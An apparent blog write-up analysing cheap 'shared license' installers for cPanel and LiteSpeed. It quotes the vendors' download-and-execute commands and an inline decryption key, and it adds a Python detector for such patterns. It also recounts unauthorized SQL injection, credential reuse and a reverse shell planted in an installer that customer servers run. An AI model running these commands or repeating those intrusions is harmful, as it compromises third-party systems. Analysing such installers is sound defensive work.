InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. Subscribe to our weekly newsletter for the coolest infosec updates: https://weekly.infosecwriteups.com/


Shared License or Crack? Access to 1000+ servers

Namaste to all readers,

Actually, I wanted to buy cPanel and LiteSpeed licenses for my hosting server, so I searched on Google and found some cheap providers advertising a "shared license".
Since cPanel only accepts international credit cards, which I didn't have, I searched for Indian providers on Google.

Usually these software plans start around $15–20/month, but some websites like SKHOST, BALLIAHOST and many others showed plans starting around $3–5 for the same.

They all said "shared license, no crack, fully secure", and since I was a complete newbie at purchasing licenses, I fell into their trap and paid for both.

I paid around $15 for both and checked their client area for the license key.
It told me to run a set of commands to activate the product:

rm -rf installer
rm -rf setup
wget license.skphost.net/litespeed/installer
chmod +x installer
./installer
SKPHost-LicenseLSWS

Really?

So they want me to install some third-party scripts for the product.

So basically I am paying for some unknown scripts that neither cPanel nor the sellers take any responsibility for ;_;
I thought, why not check the scripts they want me to run, so I fired up gdb to inspect the file.

There was a call to the system function, and after setting a breakpoint on it we can check the registers for the argument it receives:

rm -rf /root/setup ; cd /root ; wget http://litespeed.resellercenter.ir/litespeedv1/setup > /dev/null 2>&1 ; chmod +x setup
php /root/setup

So this script is fetching a PHP file from another server.

The entire script is protected by SourceGuardian.
According to the SourceGuardian website, "Our PHP encoder protects your PHP code by compiling the PHP source code into a binary bytecode format, which is then supplemented with an encryption layer."
So we can't recover the original source code from memory, but I found an excellent write-up on this on Medium by Chris Lyne.

https://medium.com/tenable-techblog/dumping-php-opcodes-protected-by-sourceguardian-a0acd8058038

I used Chris Lyne's trick for dumping the PHP opcodes from the file.

KaBoooom!! XD

This script was installing Proxychains and LiteSpeed, and fetching some more files.
One line, apart from their own files, that caught my eye was:

‘cd /usr/src; rm -rf lsws_whm_autoinstaller.sh; wget https://www.litespeedtech.com/packages/cpanel/lsws_whm_autoinstaller.sh; chmod a+x lsws_whm_autoinstaller.sh; ./lsws_whm_autoinstaller.sh TRIAL 1 0 admin WFi9fqhxxxxxxxxxxxx root@localhost 1 1’

So every server that ran their scripts to install LSWS ends up with the same credentials for the LiteSpeed web console.

Again, let's analyze the external files we got here.

wget http://litespeed.resellercenter.ir/litespeedv1/RcLicenseLSWS

root@ip:/tmp/litespeed# file RcLicenseLSWS
RcLicenseLSWS: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=1d86ee60cbf26237bab45e92bb19e5dac19bd9a3, not stripped
root@ip:/tmp/litespeed#

Again a system call fetching another file ;-;

wget -O /usr/bin/.RcLicense_lsws https://litespeed.resellercenter.ir/litespeedv2/seRcLicense_lsws > /dev/null 2>&1
openssl aes-256-cbc -in /usr/bin/.RcLicense_lsws -out /usr/local/.vmfilsws -d -pass pass:xxxxxxxxxxxx
php /usr/local/.vmfilsws
comp0 -i /usr/local/.vmfilsws > /dev/null 2>&1
umount /usr/local/.vmfilsws > /dev/null 2>&1
rm -rf /usr/local/.vmfilsws > /dev/null 2>&1
rm -rf /usr/bin/.RcLicense_lsws > /dev/null 2>&1

This seRcLicense file is encrypted with OpenSSL, but wait, what's the point when the password is in the binary itself 😆

After decrypting it, it was again a PHP file encoded with SourceGuardian, but we can dump the opcodes as before.
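A static first pass that generalizes the manual gdb inspection of the two installers above, added here as an example that is not part of the original post: it pulls printable strings out of a downloaded binary (like `strings` does) and flags the patterns seen in both files, namely a remote fetch, fetch-then-chmod-execute chains, `openssl ... -pass pass:` with an inline key, hidden dotfiles under system paths, silenced output and an unstripped `system` symbol. The sample bytes, hostnames, key and rule weights are constructed assumptions for the example.

```python
import re

# Constructed sample bytes standing in for a downloaded "installer" ELF.
# The strings mirror the pattern in the post; hostnames and key are made up.
SAMPLE_BLOB = (
    b"\x7fELF\x02\x01\x01" + b"\x00" * 9
    + b"rm -rf installer\x00wget license.example.invalid/litespeed/installer\x00"
    + b"rm -rf /root/setup ; cd /root ; wget http://lic.example.invalid/setup"
    + b" > /dev/null 2>&1 ; chmod +x setup\x00php /root/setup\x00"
    + b"openssl aes-256-cbc -in /usr/bin/.RcLicense_lsws -out /usr/local/.vmfilsws"
    + b" -d -pass pass:madeupkey\x00umount /usr/local/.vmfilsws > /dev/null 2>&1\x00"
    + b"libc.so.6\x00system\x00"
)

# Each rule: (weight, regex). Weights are an assumption chosen for this example.
RULES = {
    "remote_fetch":      (2, re.compile(r"\b(wget|curl)\b.*?\s(?:https?://)?[\w.-]+\.[a-z]{2,}\S*")),
    "fetch_then_exec":   (3, re.compile(r"\b(wget|curl)\b.*;\s*chmod\s+\+x")),
    "hardcoded_secret":  (3, re.compile(r"-pass\s+pass:\S+")),
    "hidden_file":       (2, re.compile(r"/(usr|var|tmp|root|etc)\S*/\.[A-Za-z0-9_]")),
    "output_suppressed": (1, re.compile(r">\s*/dev/null\s+2>&1")),
    "calls_system":      (1, re.compile(r"^system$")),  # symbol name in an unstripped ELF
}

def extract_strings(blob: bytes, min_len: int = 6) -> list:
    """Like `strings`: runs of printable ASCII at least min_len long."""
    return [m.decode("ascii") for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, blob)]

def triage(blob: bytes) -> dict:
    """Map each triggered rule name to the strings that triggered it."""
    findings = {}
    for s in extract_strings(blob):
        for name, (_, rx) in RULES.items():
            if rx.search(s):
                findings.setdefault(name, []).append(s)
    return findings

def verdict(findings: dict) -> str:
    """Sum the weights of triggered rules into a coarse decision."""
    score = sum(RULES[name][0] for name in findings)
    if score >= 5:
        return "do-not-run"
    return "review" if score else "clean"

if __name__ == "__main__":
    found = triage(SAMPLE_BLOB)
    for name, hits in found.items():
        print(f"[{name}]")
        for h in hits:
            print("   ", h)
    print("verdict:", verdict(found))
```

Run it against the real file with `triage(open("installer", "rb").read())`; a hit on `hardcoded_secret` alone is the page's openssl case, and `fetch_then_exec` is the first installer's download-and-run chain.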

After checking this, it was not difficult to understand how they were blocking all traffic to LiteSpeed's servers, redirecting it to their own, and replacing the license with their "socks" one.

Anyway, enough of these binaries and PHP files.

Let's get straight to the server access, the jackpot part 😈

Since I had purchased this license from Indian sellers who were reselling it from Iranian websites, I ran some subdomain enumeration and waybackurls tools and got some interesting links.

After checking a few links, I found that some of them were vulnerable to SQLi.

From one table: 900+ active IPs.

I checked the IPs on verify.cpanel.net and none of them had a working plan active.

Either expired or running on a 15-day trial.

Remember the password for LiteSpeed in the script used for configuring it?
I picked IPs from the database at random and tried to log in.

But this is not what we are interested in, so I tried using the credentials found via the links.
And voila, it worked, and after getting access to their site I was able to see all of their data and files.

On checking their database, there were 9K+ IPs, more than a thousand of them active.

Basically, they were running an entire WHMCS for selling these scripts, which takes an IP from the user while purchasing (making them believe that their IP is getting authorized with a license).
For reselling, they made a portal and WHMCS plugins for providing the scripts to users.
I simply placed a reverse shell in one of their installer scripts, and boom:

since I was able to modify or add anything I wanted, the servers fetching those files would run it blindly.

Well, this was just from a single supplier, but if you google for cheap cPanel, WHMCS, LiteSpeed, etc. software or "shared licenses", you will find thousands of websites selling these types of cracks for cheap.
In the name of selling shared licenses, they are forcing you to install their own scripts.
Anyway, I wasted around $15 for nothing and later had to buy the licenses again from the official sites.

Conclusion: never trust cheap alternatives available on the internet, and stop using cracked/nulled software.
